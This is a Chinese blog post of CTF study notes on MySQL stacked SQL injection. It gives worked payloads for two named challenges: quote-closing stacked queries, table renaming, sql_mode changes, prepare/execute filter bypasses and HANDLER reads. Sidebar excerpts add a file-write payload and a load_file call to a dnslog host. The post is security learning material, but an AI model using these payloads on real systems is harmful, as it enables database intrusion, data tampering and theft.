sql注入 堆叠注入

最新推荐文章于 2023-04-11 11:51:17 发布
最新推荐文章于 2023-04-11 11:51:17 发布
阅读量571 收藏 7
点赞数 3
分类专栏: ctf # web 文章标签: mysql sql ctf sql注入 堆叠注入
不允许转载
本文链接:https://blog.csdn.net/weixin_46081055/article/details/119496181
版权
ctf 同时被 2 个专栏收录
85 篇文章 9 订阅
订阅专栏
web
48 篇文章 2 订阅
订阅专栏

堆叠注入

使用multi_query()执行一条或多条sql语句,然后将结果全部输出,就会有这种漏洞

一次性执行多条查询语句

总之前面闭合,后面注释掉

xxx' ;show databases;--+
show tables
';show columns from `表名`; --+

绕过方法

连接

[SUCTF 2019]EasySQL

set sql_mode=pipes_as_concat;
依旧是要一起用的

pipes_as_concat:将导致 “||” 字符串被视为一个标准的 SQL 字符串合并操作符,而不是 “OR” 操作符的一个同义词。

堆叠注入下可以改变sql的||符号的作用,使之变成连接字符串符号,也就成为了唯一一个不需要括号就能连接字符串的方法

通过改表名和列名

当限制select 或者对flag相关字符串过滤严重时候,可以改表名,利用本来sql语句查询的表,打印flag

rename table 'xx' to 'xx';

alter table 'xx' change 'xx' 'xx2' varchar(100);
# ALTER TABLE (表名) CHANGE (要修改的列) (修改后的列名) VARCHAR(20)(类型);

[强网杯 2019]随便注

-1';
rename table `words` to `test`;
rename table `1919810931114514` to `words`;
alter table `words` change `flag` `id` varchar(100);
show columns from words;--+

一定要一起用...如果words表,或者id的列没了就麻烦了
然后改表后表的结构变化了,字段(列)不一样多,所以还要重新构造查询的语句

select被过滤时

CONCAT和预编译绕过

[强网杯 2019]随便注

以堆叠注入为例
xxx';			//最前面这句话好像要报错比如写-1.后面才会执行,,,好吧是最后忘了注释掉
set @sql=CONCAT('se','lect * from [表名];');
prepare stmt from @sql;
execute stmt;
#

handler语句

handler语句并不具备select语句的所有功能,它是mysql专用的语句,并没有包含到SQL标准中。

HANDLER tbl_name OPEN [ [AS] alias]		# 打开一张表,无返回结果,实际上声明了一个名为tb1_name的句柄。

HANDLER tbl_name READ index_name { = | <= | >= | < | > } (value1,value2,...)
    [ WHERE where_condition ] [LIMIT ... ]
HANDLER tbl_name READ index_name { FIRST | NEXT | PREV | LAST }
    [ WHERE where_condition ] [LIMIT ... ]
HANDLER tbl_name READ { FIRST | NEXT }
    [ WHERE where_condition ] [LIMIT ... ]
# 获取句柄的第一行,通过READ NEXT依次获取其它行。最后一行执行之后再执行NEXT会返回一个空的结果。

HANDLER tbl_name CLOSE					# 关闭打开的句柄。

[强网杯 2019]随便注

1';
handler `1919810931114514` open;
handler `1919810931114514` read first;-- +


也要在一次查询中运行完哦

wp

1.[SUCTF 2019]EasySQL

这道题目需要我们去对后端语句进行猜解

1、输入非零数字得到的回显 1 和输入其余字符得不到回显 => 来判断出内部的查询语句可能存在有 ||

2、也就是 select 输入的数据 || 内置的一个列名 from 表名 => 即为

后台语句为:select $post[‘query’]||flag from Flag

所以我们要解决的问题是 || 或这个问题

payload:

1;set sql_mode=PIPES_AS_CONCAT;select 1

拼接效果为:select 1;set sql_mode=PIPES_AS_CONCAT;select 1||flag from Flag

关于 sql_mode : 它定义了 MySQL 应支持的 SQL 语法,以及应该在数据上执行何种确认检查,其中的PIPES_AS_CONCAT||视为字符串的连接操作符而非 “或” 运算符

在 oracle 缺省支持 通过 ‘ || ’ 来实现字符串拼接。

但在 mysql 缺省不支持。需要调整 mysql 的 sql_mode模式:pipes_as_concat 来实现 oracle 的一些功能

这个就可以解决 || 带来的问题了

select 1||flag from Flag 呢,看起来没有遇见过,但是就是相当于在表后面加一列 1

还有一个非预期解

*,1

好像是因为没有过滤 * 而造成的,拼接后不难理解

shu天
关注
  • 3
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
第18天:WEB漏洞-SQL注入之堆及WAF绕过注入1
08-03
1、逻辑问题 2、性能问题 3、白名单
sql注入 - 堆注入
wcy19990628的博客
02-10 318
5、堆(多语句)注入 http://localhost/sqli-labs-master/Less-38/?id=-1'; select "<?php phpinfo();?>" into outfile "D:\\phpStudy\\PHPTutorial\\WWW\\aaaaaaaaqq.php" ;-- 在php连接mysql注入中用到了musqli_multi_query...
sql注入之堆注入
weixin_42566218的博客
02-19 8307
一、堆注入的原理 mysql数据库sql语句的默认结束符是以";"号结尾,在执行多条sql语句时就要使用结束符隔 开,而堆注入其实就是通过结束符来执行多条sql语句 比如我们在mysql的命令行界面执行一条查询语句,这时语句的结尾必须加上分号结束 select * from student; 如果我们想要执行多条sql那就用结束符分号进行隔开,比如在查询的同时查看当前登录用户是谁 select * from student;select current_user();
SQL注入- 堆注入
m0_52149675的博客
04-05 3037
​stacked injections(堆注入)从名词的含义就可以看到应该是一堆sql语句(多条)一起执行。而在真实的运用中也是这样的,我们知道在mysql 中,主要是命令行中,每一条语句结尾加;表示语句结束。这样我们就想到了是不是可以多句一起使用。这个叫做stacked injection。
SQL注入——堆注入
Zhujiangcheng的博客
06-08 874
SQL注入简介——堆注入(一)SQL注入的概述和分类1.概述2.分类①按照数据提交的方式来分类:②按照执行效果来分类:③按照注入点类型来分类:(二)堆注入1.概念2.局限 (一)SQL注入的概述和分类 1.概述   首先说,什么是SQL注入?   程序员在开发用户和数据库交互的系统时没有对用户输入的字符串进行过滤、转义、限制,或者处理不严谨,导致用户可以通过输入精心构造的字符串去非法获取到数据库中的数据,这一构造字符串非法获取数据的过程就被称为SQL注入。 2.分类 (参考来源: link.) ①按照数
sql injection(SQL注入)教程
10-25
sql injection(SQL注入)教程 1判断有无sql注入漏洞 2union注入 3盲注 4报错注入 5堆注入 6二次注入 ...
SXU-网络攻防第六次作业-sql注入进阶
12-27
把test靶场中的报错注入,时间注入,堆注入,宽子节注入进行练习.这四个注入在127.0.0.1/test/sql/路径下﹒按破解步骤进行,至少做到爆表名这一步﹒每个步骤都要按考试要求去做:保留每次攻击的输入和执行结果截图
SQLMap完成安全测试
03-03
全面支持六种SQL注入技术:boolean-based盲注、time-based盲注、error-based、UNION查询、堆查询和带外查询。 通过提供DBMS凭证、IP地址、端口和数据库名,支持不通过SQL注入的直接连接数据库。 支持枚举用户、密码...
sqli-labs.zip
08-07
sqli-labs是一个开源且非常有学习价值的SQL注入靶场,基本上涉及到了所有的SQL注入方式,比如union注入、Boolean盲注、报错注入、时间盲注、堆注入、POST注入、cookie注入、UA注入、Referer注入、base64注入等等。
SQL注入】堆注入
07-15 907
SQL-堆注入
sql-堆注入
zhhhb1005的博客
08-14 491
前几星期写题时遇见了好几道关于堆注入的题目,结果发现我对堆注入不是特别了解,所以写一下博客记录一下,但是发现堆注入使用的场景和条件好像有点苛刻。
SQL注入-堆注入
m0_53820621的博客
08-15 1363
数据库支持堆查询,所谓堆查询就是执行多条语句,语句以;隔开。并且代码使用了支持堆查询的函数,列如PHP的。堆注入就是在第二条语句中构造payload,注:页面只返回第一条语句,不返回第二条语句。堆注入后果很严重,可以直接对数据库增删改。...
sql注入——堆注入
cxrpty的博客
02-10 459
注入即多语句注入,多条语句用;隔开 以sql labs38为例 1.在dnslog上获取 2.在sql labs38上输入多条语句: http://localhost/sqli-labs-master/Less-38/?id=1'; select load_file("\\\\9shl7n.dnslog.cn\\dsfs"); -- - 3.可看到在dnslog上执行成功 ...
15-SQL注入
qq_56414082的博客
03-29 1445
参考资料;sqlmap中存放绕过waf的一些脚本小插件在tamper文件夹中创建rdog.py,在tamper中找个文件打开,复制脚本修改""""""import repass(*/)')(*/)')//--proxy是代理,和bg抓包IP一致可以看到的是代码并没有按照我们预期执行,我们添加代理看看到底是个什么情况可以看到user-agent是,安全软件当中是禁止使用这种脚本客户端所以就被拦截,自然插件脚本也就没办法正常执行解决思路:通过抓包对比分析。
sql注入知识---堆注入
尘玥的故事
04-11 1123
注入的使用条件十分有限,其可能受到API或者数据库引擎,又或者权限的限制只有当调用数据库函数支持执行多条sql语句时才能够使用,利用mysqli_multi_query()函数就支持多条sql语句同时执行,但实际情况中,如PHP为了防止sql注入机制,往往使用调用数据库的函数是mysqli_ query()函数,其只能执行一条语句,分号后面的内容将不会被执行,所以可以说堆注入的使用条件十分有限,一旦能够被使用,将可能对网站造成十分大的威胁。根据数据库类型决定是否支持多条语句执行(核心)
渗透测试-SQL注入之堆注入-攻防世界supersqli实战
保持微笑的博客
01-19 1836
1.堆注入原理 平常我们注入时都是通过对原来sql语句传输数据的地方进行相关修改,注入情况会因为该语句本身的情况而受到相关限制,例如一个select语句,那么我们注入时也只能执行select操作,无法进行增、删、改,其他语句也同理,所以可以说我们能够注入的十分有限。 但堆注入则完全打破了这种限制,其名字顾名思义,就是可以堆一堆sql注入进行注入,这个时候我们就不受前面语句的限制可以为所欲为了。其原理也很简单,就是将原来的语句构造完后加上分号,代表该语句结束,后面在输入的就是一个全新的sql语句了,这
Sqli-labs Less38-45 堆注入
kevinhanser
08-10 685
本文记录 SQL 注入的学习过程,资料为 SQLi SQLi 博客目录 Less - 38: GET- Stacked Query Injection - String 源代码 $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; 测试 http://10.10.10.137/sqli-labs/Less-38/?id=...
sqlmap堆注入
最新发布
09-04
注入是一种高级的SQL注入技术,它利用了多个SQL查询语句在同一次数据库连接中执行的特性。 堆注入的原理是将多个SQL查询语句通过分号(;)进行分隔,并在应用程序中通过相关的注入点将它们拼接在一起。这样,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

shu天

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值